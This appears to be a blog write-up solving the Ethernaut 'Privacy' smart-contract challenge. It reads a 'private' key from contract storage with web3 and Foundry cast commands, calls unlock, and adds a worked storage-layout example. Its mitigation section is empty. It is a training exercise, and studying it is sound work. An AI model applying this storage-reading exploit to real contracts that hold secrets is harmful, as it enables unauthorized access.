# Smart Contract Hacking Ethernaut: 12. Privacy

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)

**Published on:** 2023-09-28

**URL:** https://paragraph.com/@leekdev/ethernaut-12-privacy

## Content

Ethernaut is a wargame developed by OpenZeppelin and based on the Solidity programming language. Each level has a smart contract that needs to be hacked.

### Tutorials

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - ….

### Challenge

Set the contract's `locked` variable to true.

### Hack approach

The key `data` variable is `private`, but its position in storage can be worked out: it sits in slot 5 of the contract, so its value can be read directly.

Solidity Storage

```javascript
// Read storage slot 5 of the level instance
await web3.eth.getStorageAt(instance, 5);
// Output: 0x8e9f9f61dd738241ee4429348250eb6bcd4b985d1546db55888fe7bb937b5ae5

// Pass the first 16 bytes of that value as the key
await contract.unlock("0x8e9f9f61dd738241ee4429348250eb6b");
```

If the contract version is relatively recent, you can read it directly with Foundry's `cast` command.

```bash
# Read the slots in a loop
slot=0
while [ "$slot" -lt 10 ]; do
  echo "Slot:$slot"
  cast storage --rpc-url "https://eth-sepolia.g.alchemy.com/v2/$API_KEY_ALCHEMY" 0xF65BD48b8ecf7AA3d73FA9B58548B4de7a1c28Dc "$slot"
  slot=$((slot + 1))
done

# Print the contract's full storage layout
cast storage --rpc-url "https://eth-mainnet.g.alchemy.com/v2/$API_KEY_ALCHEMY" 0xB519a3E46D43c2ab98A7cAbC6bBF00DF491438e6
```

### Hack cases

### Mitigation ideas

…

### References

- Layout of State Variables in Storage 0.8.21
- Cheatcodes Reference
- https://evm.storage/
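
The slot arithmetic behind the "slot 5" claim, as an added example that is not part of the original post: it applies Solidity's storage packing rules to the level's state variables and truncates the slot value quoted on the page to 16 bytes, the way a `bytes32` to `bytes16` conversion does. The declaration list in `PRIVACY_VARS` is an assumption (the page does not show the contract source), and `layout`, `toBytes16` and `SLOT5_FROM_PAGE` are names made up for this example.

```javascript
// Added example (not from the original post): Solidity storage packing rules.
// Byte sizes of the value types used below.
const SIZES = { bool: 1, uint8: 1, uint16: 2, address: 20, uint256: 32, bytes32: 32 };

// Assumed declaration order of the Privacy level's state variables;
// the page does not show the contract source.
const PRIVACY_VARS = [
  { name: "locked", type: "bool" },
  { name: "ID", type: "uint256" },
  { name: "flattening", type: "uint8" },
  { name: "denomination", type: "uint8" },
  { name: "awkwardness", type: "uint16" },
  { name: "data", type: "bytes32", length: 3 }, // bytes32[3]
];

// Slot 5 value quoted on the page.
const SLOT5_FROM_PAGE = "0x8e9f9f61dd738241ee4429348250eb6bcd4b985d1546db55888fe7bb937b5ae5";

// Returns [{ name, slot, offset, size }]. Variables fill a 32-byte slot in
// declaration order; one that does not fit starts the next slot. A fixed-size
// array starts on a fresh slot, and so does whatever is declared after it.
function layout(vars) {
  const out = [];
  let slot = 0, offset = 0;
  const nextSlot = () => { if (offset > 0) { slot += 1; offset = 0; } };
  const place = (name, size) => {
    if (offset + size > 32) nextSlot();
    out.push({ name, slot, offset, size });
    offset += size;
  };
  for (const v of vars) {
    const size = SIZES[v.type];
    if (size === undefined) throw new Error(`unsupported type: ${v.type}`);
    if (v.length === undefined) { place(v.name, size); continue; }
    nextSlot();
    for (let i = 0; i < v.length; i++) place(`${v.name}[${i}]`, size);
    nextSlot();
  }
  return out;
}

// bytes32 -> bytes16 keeps the left-most (high-order) 16 bytes of the word.
function toBytes16(word) {
  if (!/^0x[0-9a-fA-F]{64}$/.test(word)) throw new Error("expected a 32-byte hex word");
  return word.slice(0, 2 + 32);
}

console.table(layout(PRIVACY_VARS));
console.log(toBytes16(SLOT5_FROM_PAGE));
```

The table shows the three small integers sharing slot 2 and `data[2]` landing alone in slot 5, which is why a single `getStorageAt` call is enough to recover a value the contract marks `private`.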